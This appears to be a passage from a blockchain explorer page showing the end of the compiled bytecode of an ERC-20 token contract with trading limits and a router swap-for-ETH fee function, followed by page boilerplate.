0fd5b505f8385612542919061384a565b9050809150509392505050565b5f80828461255d9190613683565b9050838110156125a2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612599906138c7565b60405180910390fd5b8091505092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361261a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612611906134b4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612688576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161267f90613542565b60405180910390fd5b6126938383836129c5565b6126fc81604051806060016040528060268152602001613b1c602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061278b815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461254f90919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516128289190612e9e565b60405180910390a3505050565b5f61283f30610c7f565b9050601460095461285091906137ac565b81111561286957601460095461286691906137ac565b90505b81811115612875578190505b5f81111561288757612886816129ca565b5b5f6015819055505f6014819055505f60168190555060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015612900573d5f803e3d5ffd5b505050565b5f808303612915575f9050612976565b5f828461292291906137ac565b9050828482612931919061381a565b14612971576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161296890613955565b60405180910390fd5b809150505b92915050565b5f6129bd83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250612bfd565b905092915050565b505050565b5f600267ffffffffffffffff8111156129e6576129e5613973565b5b604051908082528060200260200182016040528015612a145781602001602082028036833780820191505090505b50905030815f81518110612a2b57612a2a6139a0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612ace573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190612af291906139e1565b81600181518110612b0657612b056139a0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612b6b307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8461189b565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401612bcc959493929190613ac3565b5f604051808303815f87803b158015612be3575f80fd5b505af1158015612bf5573d5f803e3d5ffd5b505050505050565b5f8083118290612c43576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c3a9190612cce565b60405180910390fd5b505f8385612c51919061381a565b9050809150509392505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f612ca082612c5e565b612caa8185612c68565b9350612cba818560208601612c78565b612cc381612c86565b840191505092915050565b5f6020820190508181035f830152612ce68184612c96565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612d1b82612cf2565b9050919050565b612d2b81612d11565b8114612d35575f80fd5b50565b5f81359050612d4681612d22565b92915050565b5f819050919050565b612d5e81612d4c565b8114612d68575f80fd5b50565b5f81359050612d7981612d55565b92915050565b5f8060408385031215612d9557612d94612cee565b5b5f612da285828601612d38565b9250506020612db385828601612d6b565b9150509250929050565b5f8115159050919050565b612dd181612dbd565b82525050565b5f602082019050612dea5f830184612dc8565b92915050565b5f60208284031215612e0557612e04612cee565b5b5f612e1284828501612d38565b91505092915050565b5f819050919050565b5f612e3e612e39612e3484612cf2565b612e1b565b612cf2565b9050919050565b5f612e4f82612e24565b9050919050565b5f612e6082612e45565b9050919050565b612e7081612e56565b82525050565b5f602082019050612e895f830184612e67565b92915050565b612e9881612d4c565b82525050565b5f602082019050612eb15f830184612e8f565b92915050565b5f805f60608486031215612ece57612ecd612cee565b5b5f612edb86828701612d38565b9350506020612eec86828701612d38565b9250506040612efd86828701612d6b565b9150509250925092565b5f60ff82169050919050565b612f1c81612f07565b82525050565b5f602082019050612f355f830184612f13565b92915050565b612f4481612d11565b82525050565b5f602082019050612f5d5f830184612f3b565b92915050565b612f6c81612dbd565b8114612f76575f80fd5b50565b5f81359050612f8781612f63565b92915050565b5f8060408385031215612fa357612fa2612cee565b5b5f612fb085828601612d38565b9250506020612fc185828601612f79565b9150509250929050565b5f8060408385031215612fe157612fe0612cee565b5b5f612fee85828601612d38565b9250506020612fff85828601612d38565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061304d57607f821691505b6020821081036130605761305f613009565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61309a602083612c68565b91506130a582613066565b602082019050919050565b5f6020820190508181035f8301526130c78161308e565b9050919050565b7f546f6b656e3a206e6f2045544820746f20636c656172000000000000000000005f82015250565b5f613102601683612c68565b915061310d826130ce565b602082019050919050565b5f6020820190508181035f83015261312f816130f6565b9050919050565b7f54726164696e6720616c726561647920656e61626c65640000000000000000005f82015250565b5f61316a601783612c68565b915061317582613136565b602082019050919050565b5f6020820190508181035f8301526131978161315e565b9050919050565b5f819050919050565b5f6131c16131bc6131b78461319e565b612e1b565b612d4c565b9050919050565b6131d1816131a7565b82525050565b5f60c0820190506131ea5f830189612f3b565b6131f76020830188612e8f565b61320460408301876131c8565b61321160608301866131c8565b61321e6080830185612f3b565b61322b60a0830184612e8f565b979650505050505050565b5f8151905061324481612d55565b92915050565b5f805f6060848603121561326157613260612cee565b5b5f61326e86828701613236565b935050602061327f86828701613236565b925050604061329086828701613236565b9150509250925092565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6132f4602683612c68565b91506132ff8261329a565b604082019050919050565b5f6020820190508181035f830152613321816132e8565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f613382602483612c68565b915061338d82613328565b604082019050919050565b5f6020820190508181035f8301526133af81613376565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613410602283612c68565b915061341b826133b6565b604082019050919050565b5f6020820190508181035f83015261343d81613404565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61349e602583612c68565b91506134a982613444565b604082019050919050565b5f6020820190508181035f8301526134cb81613492565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61352c602383612c68565b9150613537826134d2565b604082019050919050565b5f6020820190508181035f83015261355981613520565b9050919050565b7f54726164696e67206973206e6f74206163746976652e000000000000000000005f82015250565b5f613594601683612c68565b915061359f82613560565b602082019050919050565b5f6020820190508181035f8301526135c181613588565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b5f613622603583612c68565b915061362d826135c8565b604082019050919050565b5f6020820190508181035f83015261364f81613616565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61368d82612d4c565b915061369883612d4c565b92508282019050808211156136b0576136af613656565b5b92915050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f6136ea601383612c68565b91506136f5826136b6565b602082019050919050565b5f6020820190508181035f830152613717816136de565b9050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b5f613778603683612c68565b91506137838261371e565b604082019050919050565b5f6020820190508181035f8301526137a58161376c565b9050919050565b5f6137b682612d4c565b91506137c183612d4c565b92508282026137cf81612d4c565b915082820484148315176137e6576137e5613656565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61382482612d4c565b915061382f83612d4c565b92508261383f5761383e6137ed565b5b828204905092915050565b5f61385482612d4c565b915061385f83612d4c565b925082820390508181111561387757613876613656565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f6138b1601b83612c68565b91506138bc8261387d565b602082019050919050565b5f6020820190508181035f8301526138de816138a5565b9050919050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f61393f602183612c68565b915061394a826138e5565b604082019050919050565b5f6020820190508181035f83015261396c81613933565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f815190506139db81612d22565b92915050565b5f602082840312156139f6576139f5612cee565b5b5f613a03848285016139cd565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b613a3e81612d11565b82525050565b5f613a4f8383613a35565b60208301905092915050565b5f602082019050919050565b5f613a7182613a0c565b613a7b8185613a16565b9350613a8683613a26565b805f5b83811015613ab6578151613a9d8882613a44565b9750613aa883613a5b565b925050600181019050613a89565b5085935050505092915050565b5f60a082019050613ad65f830188612e8f565b613ae360208301876131c8565b8181036040830152613af58186613a67565b9050613b046060830185612f3b565b613b116080830184612e8f565b969550505050505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220585ae3022fc6a5f9599a77de50d28eb13259afc89c022e42c2d8012b4fbcc07664736f6c63430008190033
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.